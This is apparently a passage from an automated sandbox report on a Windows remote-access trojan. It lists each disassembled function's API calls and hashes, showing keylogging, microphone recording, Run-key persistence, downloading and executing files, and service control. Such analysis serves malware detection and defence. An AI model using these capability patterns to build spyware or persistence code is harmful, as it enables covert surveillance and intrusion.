                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004031DE,80000001), ref: 0040ACF0
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004031DE), ref: 0040AD08
                                                  • Part of subcall function 0040AD45: RegOpenKeyExW.ADVAPI32(?,80000002,00000000,00000002,80000002,?,00407BEA,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000), ref: 0040AD56
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD1F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD28
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD31
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD3A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                                • String ID: origmsc
                                                • API String ID: 643209241-68016026
                                                • Opcode ID: 2c9171ac37f4d6fa257712cdd6346e4f40ea96330126c79a1d30fcacd0c05344
                                                • Instruction ID: 6c55e44a0943010ff90ef29e9deab5e02f6bc681234e841e20bcd32374ecbc90
                                                • Opcode Fuzzy Hash: 2c9171ac37f4d6fa257712cdd6346e4f40ea96330126c79a1d30fcacd0c05344
                                                • Instruction Fuzzy Hash: A711C37280010DAFCF05EF90ED598EE7778FB04305B104165F506E21A4EF35AB09CB58
                                                Function 0040264B Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?,00419D80,?,?,?,?,?,?,?,?,?,?,?,?,00402181,00000001), ref: 0040266C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Disabled.,?,?,?,?), ref: 00402697
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00402181,00000001), ref: 004026A2
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00402181), ref: 004026AC
                                                • printf.MSVCRT ref: 004026B3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BF
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                                • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Disabled.
                                                • API String ID: 1710008465-2552289483
                                                • Opcode ID: 11e19690029befe59de54d6ba24a75445ff929cbabed44acba4ab1026dfebb04
                                                • Instruction ID: eb3b56c90bd2445efaa9b045d76b4011f5b573c2245cd0345198108cbb194c44
                                                • Opcode Fuzzy Hash: 11e19690029befe59de54d6ba24a75445ff929cbabed44acba4ab1026dfebb04
                                                • Instruction Fuzzy Hash: 03115276800258BBCF11EFE0DC498FE7BBCBA15702B0444A7F942E21D1EA799684C768
                                                Function 00401814 Relevance: 15.1, APIs: 10, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040181E
                                                • CreateDirectoryW.KERNEL32(00000000), ref: 00401825
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401873
                                                • atoi.MSVCRT(00000000), ref: 0040187A
                                                • waveInOpen.WINMM(004191F0,000000FF,004191F8,0040193B,00000000), ref: 004018BD
                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004018D0
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004018D8
                                                • waveInPrepareHeader.WINMM(00419180,00000020), ref: 00401913
                                                • waveInAddBuffer.WINMM(00419180,00000020), ref: 00401922
                                                • waveInStart.WINMM ref: 0040192E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                                • String ID:
                                                • API String ID: 1097200658-0
                                                • Opcode ID: 8390b6e67e54b26922ff1895692ba30a82f639e627a6407e701ab642968fd862
                                                • Instruction ID: b734a3c13cd202d9701ed3e4bc3115da9fc503d9af51fa648038ac1b2232bf5a
                                                • Opcode Fuzzy Hash: 8390b6e67e54b26922ff1895692ba30a82f639e627a6407e701ab642968fd862
                                                • Instruction Fuzzy Hash: 38213670640202BBE7009F25EC6DAD97AB5FB84B16700C1BAE912962B0D7B94CC4DB4D
                                                Function 0040ED23 Relevance: 15.1, APIs: 10, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ED34
                                                • SetEvent.KERNEL32(?), ref: 0040ED3D
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040ED46
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 0040ED5E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 0040ED6E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ED7D
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040EDA4
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040EDBA
                                                  • Part of subcall function 0040EB85: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413764,?,?), ref: 0040EBA0
                                                  • Part of subcall function 0040EB85: getenv.MSVCRT ref: 0040EBAC
                                                  • Part of subcall function 0040EB85: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 0040EBB8
                                                  • Part of subcall function 0040EB85: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EBC5
                                                  • Part of subcall function 0040EB85: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EBD0
                                                  • Part of subcall function 0040EB85: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EBD9
                                                  • Part of subcall function 0040EB85: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040EBE6
                                                  • Part of subcall function 0040EB85: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040EBF3
                                                  • Part of subcall function 0040EB85: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040EBFF
                                                  • Part of subcall function 0040EB85: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040EC18
                                                  • Part of subcall function 0040EB85: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040EC25
                                                  • Part of subcall function 0040EB85: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040EC44
                                                  • Part of subcall function 0040EB85: ShellExecuteExA.SHELL32(0000003C), ref: 0040EC61
                                                  • Part of subcall function 0040EB85: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040EC85
                                                  • Part of subcall function 0040EB85: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040EC99
                                                  • Part of subcall function 0040EB85: CloseHandle.KERNEL32(?), ref: 0040ECA2
                                                  • Part of subcall function 0040EB85: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040ECAB
                                                  • Part of subcall function 0040EB85: DeleteFileA.KERNEL32(00000000), ref: 0040ECB2
                                                  • Part of subcall function 0040EB85: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?,?,?,?,?), ref: 0040ECCC
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EDD3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EDDC
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                                • String ID:
                                                • API String ID: 3444260106-0
                                                • Opcode ID: af8022c0208c5fc199fd166c3b32a6adca22861f41633e972df59aa8b664ab69
                                                • Instruction ID: d870172fe7cf7232c7a138a17731a4b402ab1d34a93826d7b75f455e3ca831e5
                                                • Opcode Fuzzy Hash: af8022c0208c5fc199fd166c3b32a6adca22861f41633e972df59aa8b664ab69
                                                • Instruction Fuzzy Hash: 8C21603591011AABCF04FFA5DC5A8EE7B78FF14706F0044A9F502B31B1EA34A605CB99
                                                Function 0040D2A9 Relevance: 15.1, APIs: 10, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D2B5
                                                • StrToIntA.SHLWAPI(00000000), ref: 0040D2BC
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040D2DF
                                                  • Part of subcall function 00408137: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D2FA
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D303
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D31A
                                                  • Part of subcall function 004119EF: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,75920F00,?,0040FC0A), ref: 004119FB
                                                  • Part of subcall function 004119EF: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040FC0A), ref: 00411A05
                                                  • Part of subcall function 004119EF: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411A19
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D32B
                                                  • Part of subcall function 00411F9F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?,00000001), ref: 00411FDC
                                                  • Part of subcall function 00411F9F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413984,?), ref: 00412103
                                                  • Part of subcall function 00411F9F: SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00412121
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@$D@1@@G@1@@V01@@$??2@?length@?$basic_string@?size@?$basic_string@InfoParametersSystem
                                                • String ID:
                                                • API String ID: 1124456442-0
                                                • Opcode ID: ca956ed552bc5e89b5c8d4b307b223353136c7186f37f99209fe00d10e94bc2d
                                                • Instruction ID: 20e6f7c3229ef9bcf61b370cf683929f5565303115c6d6bcbf10db3716f13a2e
                                                • Opcode Fuzzy Hash: ca956ed552bc5e89b5c8d4b307b223353136c7186f37f99209fe00d10e94bc2d
                                                • Instruction Fuzzy Hash: C811FC72A011149FCB04FBB1ED5AAED7738AF50306F1044BAF502E60E1EE789B48CB59
                                                Function 00410AB6 Relevance: 15.1, APIs: 10, Instructions: 61serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00419288,?,?,?,?,?,?,?,004103C0), ref: 00410AC5
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(000F003F,?,?,?,?,?,?,?,004103C0), ref: 00410AD5
                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004103C0), ref: 00410ADD
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004103C0), ref: 00410AEA
                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,004103C0), ref: 00410AF9
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00410B33
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00410B36
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004103C0), ref: 00410B3B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                • String ID:
                                                • API String ID: 858787766-0
                                                • Opcode ID: 6343d739d5d65fe97308eff0db34dd302ca933c718c662b70b29980daa173324
                                                • Instruction ID: f2047ca2b0dd0ba7d94b639a82de2227e5b608de2b726cb7d0e94f747e52d90f
                                                • Opcode Fuzzy Hash: 6343d739d5d65fe97308eff0db34dd302ca933c718c662b70b29980daa173324
                                                • Instruction Fuzzy Hash: E801DB31540118BFC700AFB0DC89DFF7FBCEB1579AB004025F502D2154D7A49E86DAA5
                                                Function 004110B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103networkfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 004110E1
                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 004110F6
                                                • InternetReadFile.WININET(?,?,00002710,?), ref: 00411121
                                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 00411136
                                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 00411189
                                                • InternetCloseHandle.WININET(?), ref: 004111B7
                                                • InternetCloseHandle.WININET(?), ref: 004111BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$??2@CloseHandleOpen$FileRead
                                                • String ID: user
                                                • API String ID: 2072504707-2375276105
                                                • Opcode ID: 3291619dc62e5185dd8b90ef4c4870ad2e3e002e25387920a7a5dcdb6759ae19
                                                • Instruction ID: 8756ad890ba4a00e0636b70f89312941d37efec6fcd4f5aa562b23cbdd28fdaa
                                                • Opcode Fuzzy Hash: 3291619dc62e5185dd8b90ef4c4870ad2e3e002e25387920a7a5dcdb6759ae19
                                                • Instruction Fuzzy Hash: 6A316932A00228AFCF25DF69DC45ADF7FA6FF09350B14806AF909D7250C674AA60CB94
                                                Function 00404F14 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 69threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?), ref: 00404F3D
                                                  • Part of subcall function 0040512C: GetLocalTime.KERNEL32(?,00419830), ref: 0040513C
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ %04i/%02i/%02i %02i:%02i:%02i - ,?,! },?,?,?,?,?,6E@), ref: 00405172
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,6E@), ref: 0040517F
                                                  • Part of subcall function 0040512C: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,6E@), ref: 00405189
                                                  • Part of subcall function 0040512C: sprintf.MSVCRT ref: 00405197
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051A3
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051AC
                                                  • Part of subcall function 0040512C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051C2
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051DF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?), ref: 00404F54
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00404F68
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
